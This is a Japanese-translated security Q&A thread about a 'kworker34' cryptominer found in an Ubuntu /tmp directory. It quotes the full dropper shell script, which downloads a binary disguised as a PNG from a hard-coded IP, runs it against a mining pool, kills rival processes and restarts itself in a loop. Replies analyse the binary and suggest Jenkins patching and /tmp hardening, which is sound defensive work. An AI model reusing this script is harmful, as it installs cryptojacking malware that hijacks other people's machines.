web-dev-qa-db-ja.com

Linux上のkworker34マルウェア

Clamは、Ubuntu Linuxマシンの/ tmpディレクトリで「kworker34」という名前のこのファイルを見つけました。早速このファイルを削除しました。また、シェルファイルkws.shも見つかりました。ロシアとウクライナの2つのIPアドレスに接続しているようです。

誰かこれを見た?

これはkwa.shの内容です-

#!/bin/sh
ps -fe|grep kworker34 |grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
wget 91.235.143.237/miu.png -O /tmp/conn
dd if=/tmp/conn skip=7664 bs=1 of=/tmp/kworker34
else
wget -O /tmp/kworker34 http://91.235.143.237/kworker_na
fi
chmod +x /tmp/kworker34
Nohup /tmp/kworker34  -B -a cryptonight -o stratum+tcp://185.154.52.74:80 -u 13 -p x >/dev/null 2>&1 &
else
echo "runing....."
fi
pkill -f conns
pkill -f irqbalance
crontab -l | sed '/91.230.47.40/d' | crontab -

sleepTime=20

while [ 0 -lt 1 ]
do
    ps -fe| grep kworker34 | grep -v grep
    if [ $? -ne 0 ]
    then
        echo "process not exists ,restart process now... "
                wget 91.235.143.237/miu.png -O /tmp/conn
                dd if=/tmp/conn skip=7664 bs=1 of=/tmp/kworker34
                chmod +x /tmp/kworker34
                Nohup /tmp/kworker34 -a cryptonight -o stratum+tcp://185.154.52.74:80 -u 13 -p x >/dev/null 2>&1 &
        echo "restart done ..... "
    else
        echo "process exists , sleep $sleepTime seconds "
        pkill -f conns
        pkill -f irqbalance
        crontab -l | sed '/91.230.47.40/d' | crontab -
    fi
    sleep $sleepTime
done
malwarelinuxubuntu
5
Do Will
_... /tmp/kworker34 ... -o stratum+tcp://185.154.52.74:80 ...
_

stratum + tcp のグーグルは、暗号通貨マイニングが進行中であることを示します。

_ wget 91.235.143.237/miu.png -O /tmp/conn
 dd if=/tmp/conn skip=7664 bs=1 of=/tmp/kworker34
_

_file /tmp/kworker34_でよく見ると、/tmp/kworker34: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, strippedになります。つまり、PNGファイルはLinuxバイナリの転送に使用されます。

_strings /tmp/kworker34_は多くの迷惑メールに分類されます:

_$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved. $
_

UPXパッカー自体は悪くありませんが、マルウェアのコンテキストでよく使用されます。 _upx -d_を使用してファイルを解凍し、再度stringsを実行すると、興味深い文字列が表示されます。

_User-Agent: cpuminer/2.3.3
...
Try `minerd --help' for more information.
Usage: minerd [OPTIONS]
  -o, --url=URL         URL of mining server
  -O, --userpass=U:P    username:password pair for mining server
  ...
_

したがって、これはおそらくcpuminerバージョン2.3.3であり、次のように記述されています on github

これは、Jeff GarzikのリファレンスcpuminerのフォークであるLitecoinとBitcoinのマルチスレッドCPUマイナーです。

不要なマイナーのトピックの詳細については、 [感染したデバイスにビットコインマイニングソフトウェアをインストールする新しいLinuxマルウェア および その他のリンク を参照してください。

11
Steffen Ullrich

はい、最近、古いJenkinsインスタンスでコードを実行できるJenkinsの脆弱性が発見されました。通常、Monero暗号通貨プログラムをマイニングします。詳細については、次のリンクを確認してください。
http://jenkins-ci.361315.n4.nabble.com/cryptonight-exploit-td4898258.htmlhttps://Twitter.com/jenkinsci/status/864178120827428864

感染を防ぐには、2.46.2/2.57以降のバージョンのJenkinsをインストールしてください。

ところでWannaCryが登場する1週間前に、Moneroマルウェアマイナーの大きな広がりがありました。

5
MichalTheDweller

プロセスが私のjenkinsビルドサーバーのユーザー認証情報で実行されていることがわかりました。これは感染の1つの方法である可能性があります。

4
Normen

[私はこれを回答として投稿するので、この問題が発生している可能性があるすべての人に役立ちます]

この問題を掘り下げて、これが起こっていたと思います。侵入者は私のアプリケーションのホールを使用して、tarファイルを/ tmpディレクトリにダウンロードするコマンドを実行していました。次に、コマンドを実行してtarファイルの内容を抽出します。 tarにはShellファイルが含まれています。次に、シェルファイル自体を実行します。

システムのスクリプトに侵入者がこっそり侵入できるようにするアプリケーションの穴を見つけることができませんでした。どうやって彼が入ったのかを見つけるのはそれほど難しくないと思います。私がその後に行く時間があまりなかったというだけです。私はすぐにそれに到達し、確かに彼を締め出すでしょう。

その間、ファイルシステムでスクリプトがダウンロードされて実行されるのを防ぐために、システムにいくつかの変更を加えました。

  • 「wget」コマンドの権限を変更しました。 Tomcatがrootとして実行されないことが非常に重要です。 Tomcatを実行しているユーザーに「wget」を実行する許可を与えないでください。
  • / tmpディレクトリは単純なディレクトリとして作成されました。 nodev、noexec、nosuid権限を持つファイルからマウントされたパーティションに変更しました。

これらのステップは、今のところ侵入者を締め出すのに役立っているようです。

1
Do Will